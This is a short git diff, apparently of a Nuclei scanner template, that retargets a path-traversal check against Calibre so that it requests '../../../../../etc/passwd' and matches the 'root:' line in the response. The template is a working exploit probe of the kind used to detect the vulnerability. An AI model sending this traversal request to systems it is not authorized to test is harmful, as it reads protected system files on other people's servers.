linux payload
parent
d284320ff9
commit
ef61b23e12
|
@ -34,7 +34,7 @@ http:
|
|||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
["extra_file", {{book_ids}}, "..\\..\\..\\Calibre Settings\\gui.json", ""]
|
||||
["extra_file", {{book_ids}}, "../../../../../etc/passwd", ""]
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -43,11 +43,11 @@ http:
|
|||
words:
|
||||
- "application/json"
|
||||
|
||||
- type: word
|
||||
- type: regex
|
||||
part: body
|
||||
words:
|
||||
- "No such file or directory:"
|
||||
- "Traceback"
|
||||
regex:
|
||||
- 'root:.*:0:0:'
|
||||
- '"result":'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
|
|
Loading…
Reference in New Issue